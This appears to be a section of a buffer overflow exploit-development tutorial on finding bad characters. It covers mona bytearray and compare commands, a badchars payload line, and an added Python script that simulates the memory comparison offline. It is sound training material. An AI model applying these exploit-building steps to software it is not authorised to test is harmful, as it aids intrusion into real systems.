6. Finding Bad Characters

Generate a bytearray using mona, excluding the null byte (\x00) from the start, since it is a bad character in almost every case. Note the location of the bytearray.bin file that is generated.

!mona bytearray -b "\x00"

Now generate a string of bad chars that is identical to the bytearray. The following python script can be used to generate a string of bad chars from \x01 to \xff:

#!/usr/bin/env python
# Works under Python 2 and 3; prints the escaped bytes \x01..\xff on one line,
# in the same order as the bytearray mona generated (with \x00 excluded).
from __future__ import print_function

for x in range(1, 256):
	print("\\x" + "{:02x}".format(x), end='')

print()

Put the string of bad chars before the C's in your buffer, and adjust the number of C's to compensate:

badchars = "\x01\x02\x03\x04\x05...\xfb\xfc\xfd\xfe\xff"
payload = badchars + "C" * (600-112-4-255)

Crash the application using this buffer, and make a note of the address to which ESP points. This can change every time you crash the application, so get into the habit of copying it from the register each time.

Use the mona compare command to reference the bytearray you generated, and the address to which ESP points:

!mona compare -f C:\mona\appname\bytearray.bin -a <address>
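To make clear what the compare step is actually checking, here is an added Python example (not part of the original page and not mona's code) that reproduces the logic offline: it builds the expected byte sequence, compares it against bytes read back from memory at ESP, and reports whether the data was truncated or individual bytes were altered. The memory samples in it are constructed to simulate the two common outcomes (a byte that cuts the string short, and a byte that gets replaced in transit); the function names are my own.

```python
#!/usr/bin/env python3
"""Offline reimplementation of the bad-character comparison step.

expected : the bytearray that was sent (mona's bytearray.bin)
observed : the bytes read back from memory at the address ESP points to
"""


def make_bytearray(excluded=(0x00,)):
    """Build the expected byte sequence, skipping excluded values.

    This mirrors the effect of `!mona bytearray -b "\\x00"`.
    """
    return bytes(b for b in range(256) if b not in excluded)


def compare(expected, observed):
    """Compare the bytes found in memory against the bytes that were sent.

    Returns a dict with:
      mismatches   : list of (offset, expected_byte, observed_byte)
      truncated_at : offset where memory ends early, or None
      first_bad    : the first expected byte at which things go wrong, or None
    A bad char usually shows up either as a mismatch at its offset or as the
    point where the copied data simply stops (truncation).
    """
    n = min(len(expected), len(observed))
    mismatches = [(i, expected[i], observed[i])
                  for i in range(n) if expected[i] != observed[i]]
    truncated_at = n if len(observed) < len(expected) else None

    first_bad = None
    if mismatches:
        first_bad = expected[mismatches[0][0]]
    elif truncated_at is not None:
        first_bad = expected[truncated_at]

    return {"mismatches": mismatches,
            "truncated_at": truncated_at,
            "first_bad": first_bad}


def format_badchars(values):
    """Render byte values as the escaped string form used in the payload."""
    return "".join("\\x{:02x}".format(v) for v in values)


if __name__ == "__main__":
    expected = make_bytearray()

    # Constructed sample 1: the copy stops at 0x0a (line feed), so memory
    # holds only \x01..\x09. Offset 9 in `expected` is 0x0a.
    observed_truncated = expected[:9]
    result = compare(expected, observed_truncated)
    print("sample 1:", result["truncated_at"], format_badchars([result["first_bad"]]))

    # Constructed sample 2: 0x0d (carriage return) is rewritten to 0x20 but
    # nothing is dropped. Offset 12 in `expected` is 0x0d.
    observed_altered = bytearray(expected)
    observed_altered[12] = 0x20
    result = compare(expected, bytes(observed_altered))
    print("sample 2:", result["mismatches"], format_badchars([result["first_bad"]]))
```

Only the first bad character in a run can be trusted from a single comparison: once the data is truncated or shifted, every byte after it looks wrong. The workflow is therefore iterative: add the byte just found to the excluded list, regenerate both the bytearray and the badchars string without it, crash again and compare again, until the comparison reports no mismatches.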
